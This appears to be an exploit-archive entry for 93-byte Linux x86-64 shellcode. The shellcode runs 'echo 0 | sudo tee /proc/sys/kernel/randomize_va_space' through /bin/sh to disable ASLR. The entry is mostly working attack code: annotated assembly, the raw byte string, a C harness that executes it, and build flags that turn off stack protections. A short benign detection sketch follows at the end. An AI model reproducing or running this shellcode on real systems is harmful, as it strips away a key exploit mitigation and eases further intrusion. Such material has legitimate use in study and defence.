Linux/x64 disable aslr security shellcode (93 bytes) Vulnerability / Exploit

Exploits / Vulnerability Discovered : 2018-12-19 | Type : shellcode | Platform : linux_x86-64
This exploit / vulnerability Linux/x64 disable aslr security shellcode (93 bytes) is for educational purposes only; if you use it, you do so at your own risk!

[+] Code ...

ASLR (Address Space Layout Randomization) Disable Shellcode Language C & ASM - Linux/x86_64

Author : Kağan Çapar
shellcode len : 93 bytes
compilation: gcc -fno-stack-protector -z execstack [.c] -o []

run shellcode (./aslr etc.)
check : cat /proc/sys/kernel/randomize_va_space
you will see "0"


global _start
section .ASLR

#6A3B push 0x3b ; execve syscall number (59)
#58 pop rax
#99 cdq ; edx = 0, so rdx = 0 (envp = NULL)
#48BB2F62696E2F736800 mov rbx,0x68732f6e69622f ; "/bin/sh\0"
#53 push rbx
#4889E7 mov rdi,rsp ; rdi -> "/bin/sh"
#682D630000 push 0x632d ; "-c"
#4889E6 mov rsi,rsp ; rsi -> "-c"
#52 push rdx ; NULL, terminates argv
#E836000000 call 0x56 ; pushes the address of the command string that follows
#6563686F2030207C207375646F2074656520 db "echo 0 | sudo tee "
#2F70726F632F7379732F6B65726E656C2F db "/proc/sys/kernel/"
#72616E646F6D697A655F76615F737061636500 db "randomize_va_space",0
#56 push rsi ; argv[1] = "-c"
#57 push rdi ; argv[0] = "/bin/sh"
#4889E6 mov rsi,rsp ; rsi -> argv
#0F05 syscall ; execve("/bin/sh", argv, NULL)


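#include <stdio.h>
#include <string.h>

unsigned char ASLR[] = \
"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x68\x2d\x63\x00\x00\x48"
"\x89\xe6\x52\xe8\x36\x00\x00\x00\x65\x63\x68\x6f\x20\x30\x20\x7c\x20\x73\x75\x64\x6f\x20\x74\x65"
"\x65\x20\x2f\x70\x72\x6f\x63\x2f\x73\x79\x73\x2f\x6b\x65\x72\x6e\x65\x6c\x2f\x72\x61\x6e\x64\x6f"
"\x6d\x69\x7a\x65\x5f\x76\x61\x5f\x73\x70\x61\x63\x65\x00\x56\x57\x48\x89\xe6\x0f\x05";

int main()
{
    /* sizeof rather than strlen: the bytes contain NULs, so strlen would stop early */
    printf("Shellcode len: %zu\n", sizeof(ASLR) - 1);

    int (*ret)() = (int(*)())ASLR;
    ret();
    return 0;
}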
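
A defender-side triage sketch, added here and not part of the original entry: the payload carries its shell command as plain ASCII, so a printable-run scan over a captured buffer surfaces the reference to randomize_va_space. The names find_aslr_reference, MIN_RUN and NEEDLE and the sample buffer are assumptions made for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MIN_RUN 8  /* assumed threshold: ignore shorter printable runs */
static const char NEEDLE[] = "randomize_va_space";
/* Constructed sample: the page's command string between filler bytes. */
static const unsigned char SAMPLE[] =
    "\x01\x02\x03\x00\xff"
    "echo 0 | sudo tee /proc/sys/kernel/randomize_va_space\x00"
    "\xff\x01";

/* Return the offset of the first printable run (>= MIN_RUN bytes) that names
 * the ASLR sysctl, copying the run (truncated) into out; -1 if none. */
long find_aslr_reference(const unsigned char *buf, size_t len,
                         char *out, size_t outsz)
{
    const size_t nlen = sizeof(NEEDLE) - 1;
    size_t i = 0;
    while (i < len) {
        size_t start = i;
        while (i < len && isprint(buf[i]))
            i++;
        size_t run = i - start;
        for (size_t j = start; run >= MIN_RUN && j + nlen <= i; j++) {
            if (memcmp(buf + j, NEEDLE, nlen) != 0)
                continue;
            if (outsz > 0) {
                size_t n = run < outsz - 1 ? run : outsz - 1;
                memcpy(out, buf + start, n);
                out[n] = '\0';
            }
            return (long)start;
        }
        if (run == 0)
            i++;  /* step over one non-printable byte */
    }
    return -1;
}

int main(void)
{
    char cmd[128];
    long off = find_aslr_reference(SAMPLE, sizeof(SAMPLE) - 1, cmd, sizeof cmd);
    if (off >= 0)
        printf("ASLR sysctl referenced at offset %ld: %s\n", off, cmd);
    return off < 0;
}
```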

